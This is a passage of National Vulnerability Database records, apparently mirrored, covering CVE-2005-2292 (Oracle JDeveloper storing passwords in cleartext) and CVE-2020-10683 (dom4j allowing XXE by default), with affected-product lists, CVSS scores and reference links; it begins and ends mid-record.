"af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.tenable.com/security/tns-2019-08", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-79", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2005-07-18 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 9.0.4 | |
| oracle | jdeveloper | 9.0.5 | |
| oracle | jdeveloper | 10.1.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.4:*:*:*:*:*:*:*", matchCriteriaId: "E292E294-90C2-4780-82B6-1265F8FF6040", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.5:*:*:*:*:*:*:*", matchCriteriaId: "A5EA5B15-5ABD-459D-8327-9DDC1040C04D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2:*:*:*:*:*:*:*", matchCriteriaId: "A4C7F9B0-2BF0-430D-ACB3-8E3A41AD31A3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, { lang: "es", value: "Oracle JDeveloper 9.0.4, 9.0.5, y 10.1.2 almacena passwords como texto plano en 1) IDEConnections.xml, (2) XSQLConfig.xml y (3) settings.xml. Esto permite que usuarios locales obtengan información confidencial.", }, ], id: "CVE-2005-2292", lastModified: "2025-04-03T01:03:51.193", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2005-07-18T04:00:00.000", references: [ { source: "cve@mitre.org", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://secunia.com/advisories/15991/", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { source: "cve@mitre.org", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://secunia.com/advisories/15991/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-Other", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2020-05-01 19:15
Modified
2024-11-21 04:55
Severity ?
Summary
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:dom4j_project:dom4j:*:*:*:*:*:*:*:*", matchCriteriaId: "1D7F74F1-B9EA-4659-9755-B23F7D747685", versionEndExcluding: "2.0.3", vulnerable: true, }, { criteria: "cpe:2.3:a:dom4j_project:dom4j:*:*:*:*:*:*:*:*", matchCriteriaId: "3C2C95BD-A005-44E2-ACE8-633505485D1B", versionEndExcluding: "2.1.3", versionStartIncluding: "2.1.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", matchCriteriaId: "D14ABF04-E460-4911-9C6C-B7BCEFE68E9D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", matchCriteriaId: "ED43772F-D280-42F6-A292-7198284D6FE7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3625D477-1338-46CB-90B1-7291D617DC39", versionEndIncluding: "2.10.0", versionStartIncluding: "2.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.9m0p1:*:*:*:*:*:*:*", matchCriteriaId: "C6092C11-7779-451C-94F9-24FA2F2010FB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", matchCriteriaId: "526E2FE5-263F-416F-8628-6CD40B865780", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "05AD47CC-8A6D-4AEC-B23E-701D3D649CC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "539DA24F-E3E0-4455-84C6-A9D96CD601B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9901F6BA-78D5-45B8-9409-07FF1C6DDD38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9FADE563-5AAA-42FF-B43F-35B20A2386C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:documaker:*:*:*:*:*:*:*:*", matchCriteriaId: "135D531C-A692-4BE3-AB8C-37BB0D35559A", versionEndIncluding: "12.6.4", versionStartIncluding: "12.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7E856B4A-6AE7-4317-921A-35B4D2048652", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "7DCC2C59-BB9B-4BD2-80A4-33B72737FA10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "36CF85A9-2C29-46E7-961E-8ADD0B5822CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "021014B2-DC51-481C-BCFE-5857EFBDEDDA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.7.0:*:*:*:*:*:*:*", matchCriteriaId: "87416B3B-3B2B-486B-B931-19199EF07000", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.8.0:*:*:*:*:*:*:*", matchCriteriaId: "1102B6BC-D99E-4AC0-9375-FB8517A4A71F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.9.0:*:*:*:*:*:*:*", matchCriteriaId: "4D22386C-FEC4-4984-8E2A-8FE4796BEFBE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.10.0:*:*:*:*:*:*:*", matchCriteriaId: "B283B614-9E31-4148-8688-B0672B3A77B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "6329B1A2-75A8-4909-B4FB-77AC7232B6ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.0:*:*:*:*:*:*:*", matchCriteriaId: "2051BA9E-E635-47D5-B942-8AC26E9487CB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_information_manager:3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C666FA96-3809-475C-B68F-29E59BD51959", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:*:*:*:*:*:*:*:*", matchCriteriaId: "48261B54-471D-4C03-AFF9-6F2EA8FA8EBB", versionEndIncluding: "11.3.0", versionStartIncluding: "11.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "64D4B80E-2B67-4BDC-9A3A-7BFDA171016A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: "33E0F28C-1FF3-4E12-AAE4-A765F4F81EC0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "9A570E5E-A3BC-4E19-BC44-C28D8BC9A537", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:*:*:*:*:*:*:*:*", matchCriteriaId: "5DEAB5CD-4223-4A43-AB9E-486113827A6C", versionEndIncluding: "11.3.0", versionStartIncluding: "11.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "AEDF91E2-E7B5-40EE-B71F-C7D59F4021BD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: "9A94F93C-5828-4D78-9C48-20AC17E72B8E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "F3E25293-CB03-44CE-A8ED-04B3A0487A6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "951CE1FD-CBFD-4724-919F-CF9B529F0BA5", versionEndIncluding: "16.2.20.1", versionStartIncluding: "16.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "B89D2BCD-BA96-4DCF-A8B0-59989AD1BC87", versionEndIncluding: "17.12.17.1", versionStartIncluding: "17.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "18CE17D6-FC25-4FDA-AD28-BD8533C7513A", versionEndIncluding: "18.8.19.0", versionStartIncluding: "18.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "5DE19678-FB27-4E29-A7BF-232141D52502", versionEndIncluding: "19.12.6.0", versionStartIncluding: "19.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "6D53690D-3390-4A27-988A-709CD89DD05B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:16.0:*:*:*:*:*:*:*", matchCriteriaId: "CBEEB907-B163-43FF-86DE-4387123DCC4B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", matchCriteriaId: "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "36E16AEF-ACEB-413C-888C-8D250F65C180", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", matchCriteriaId: "EE8CF045-09BB-4069-BCEC-496D5AE3B780", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*", matchCriteriaId: "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.0:*:*:*:*:*:*:*", matchCriteriaId: "BFB0BB58-04D3-409D-AECC-9633782F0E75", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.1:*:*:*:*:*:*:*", matchCriteriaId: "C7BD0D41-1BED-4C4F-95C8-8987C98908DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.0.3:*:*:*:*:*:*:*", matchCriteriaId: "47F3EA56-89AF-4AD5-BA19-D32DBDA087A7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "0791694C-9B4E-42EA-8F6C-899B43B6D769", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:15.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "312992F0-E65A-4E38-A44C-363A7E157CE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:16.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E1940FD6-39FA-4F92-9625-F215D8051E80", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0.4:*:*:*:*:*:*:*", matchCriteriaId: "78D8F551-8DC8-4510-8350-AE6BC64748DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0.6:*:*:*:*:*:*:*", matchCriteriaId: "490B2C44-CECD-4551-B04F-4076D0E053C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0.4:*:*:*:*:*:*:*", matchCriteriaId: "DEC41EB8-73B4-4BDF-9321-F34EC0BAF9E6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0.3:*:*:*:*:*:*:*", matchCriteriaId: "48EFC111-B01B-4C34-87E4-D6B2C40C0122", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", matchCriteriaId: "E55B3AA9-69BE-4136-8C3A-FD0DDCD3FA4B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "51309958-121D-4649-AB9A-EBFA3A49F7CB", versionEndIncluding: "4.3.0.6.0", versionStartIncluding: "4.3.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:2.2.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D883EED9-CC64-479D-9C0A-35EB16F43AB4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.2.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "5435B365-BFF3-4A9E-B45C-42D8F1E20FB7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.2.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1FAC3840-2CF8-44CE-81BB-EEEBDA00A34A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3F906F04-39E4-4BE4-8A73-9D058AAADB43", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7B393A82-476A-4270-A903-38ED4169E431", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "D7756147-7168-4E03-93EE-31379F6BE88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", matchCriteriaId: "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", matchCriteriaId: "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", matchCriteriaId: "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, { lang: "es", value: "dom4j versiones anteriores a 2.0.3 y versiones 2.1.x anteriores a 2.1.3, permite DTDs y External Entities por defecto, lo que podría permitir ataques de tipo XXE. Sin embargo, existe una documentación externa popular de OWASP que muestra cómo habilitar el comportamiento seguro no predeterminado en cualquier aplicación que use dom4j.", }, ], id: "CVE-2020-10683", lastModified: "2024-11-21T04:55:50.587", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-05-01T19:15:12.927", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://usn.ubuntu.com/4575-1/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://usn.ubuntu.com/4575-1/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-10-16 18:15
Modified
2024-11-21 04:41
Severity ?
Summary
